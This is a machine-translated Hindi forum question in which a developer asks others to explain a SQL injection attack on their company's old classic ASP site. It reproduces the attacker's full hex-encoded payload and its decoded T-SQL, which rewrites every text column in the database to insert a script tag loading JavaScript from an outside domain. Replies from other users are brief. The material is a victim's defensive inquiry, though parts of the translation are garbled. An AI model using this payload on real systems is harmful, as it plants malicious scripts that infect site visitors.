मैं इसे यहां पोस्ट करना चाहता था क्योंकि यह बहुत अधिक कोडिंग से संबंधित है और कुछ ऐसा था जो मुझे इस सप्ताह अपने कंपनी की पुरानी एएसपी (क्लासिक) साइटों में से एक पर साफ करना था।क्या कोई मुझे इस एसक्यूएल इंजेक्शन हमले की व्याख्या कर सकता है?
हमें कुछ दिन पहले चलाए गए एसक्यूएल इंजेक्शन हमले के साथ मारा गया था, लेकिन मैं अपने सिर को खरोंच कर रहा हूं, वास्तव में एसक्यूएल सर्वर (इन एसक्यूएल प्रश्नों के माध्यम से) 'नुकसान' था।
ईमानदार होने के लिए, मैंने सोचा कि यह जिस तरह से किया गया था, वह बहुत ही सरल था, और मेरी कंपनियों को पुरानी 10 साल की पुरानी साइट के लिए गलती नहीं है, बिना किसी स्वच्छता इनपुट के।
हमले:
122 + घोषित +% 40 + varchar% 284,000% 29 + सेट +% 40% 3Dcast% 280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e333020616e 6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f6c696c75706f7068696c75706f702e636f6d2f736c2e706870223e3c2f7363726970743e3c212d2d27272b525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d2929207768657265204c45465428525452494d28434f4e5645525428564152434841522836303030292c5b272b40432b275d29292c3137293c3e2727223e3c2f7469746c653e3c7363726970742727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 + के रूप में + varchar% 284,000% 29% 29 + कार्यकारी% 28% 40% 29-
क्या यह करने के लिए डीकोड:(क्या मैं समझता हूँ करना चाहते हैं)
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['[email protected]+'] SET ['[email protected]+']=''"></title><script src="http://lilXXXXXXXop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['[email protected]+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['[email protected]+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
हम एक बैकअप (पूर्व इंजेक्शन) बरामद किया गया और पूरे एप्लिकेशन के माध्यम से चला गया और स्वच्छ गए सभी इनपुट बयान। हमारा सर्वर फ़ायरवॉल किया गया है, इसलिए कोई प्रत्यक्ष एसक्यूएल एक्सेस नहीं है, हालांकि मैं जानना चाहता हूं कि और क्या छोड़ा जा सकता है, और मुझे एसक्यूएल क्वेरी स्वीकार करना है मेरे सिर पर है।
क्या कोई इस पर एक दरार ले सकता है और मेरे लिए एसक्यूएल हमले की व्याख्या कर सकता है?
क्षमा याचना मैं पूर्ण DUMP & एसक्यूएल
ऐसा लगता है कि आपकी HTML फ़ाइलों AFAICT के कुछ हिस्से में एक जावास्क्रिप्ट फ़ाइल संलग्न करना प्रतीत होता है। – Blender
'0xFF चुनें; 'returns' MySQL के साथ, this', आप इस पथ का पता लगाना चाहेंगे। –
अगर आप स्निप से छुटकारा पाएं और पूरी चीज – griegs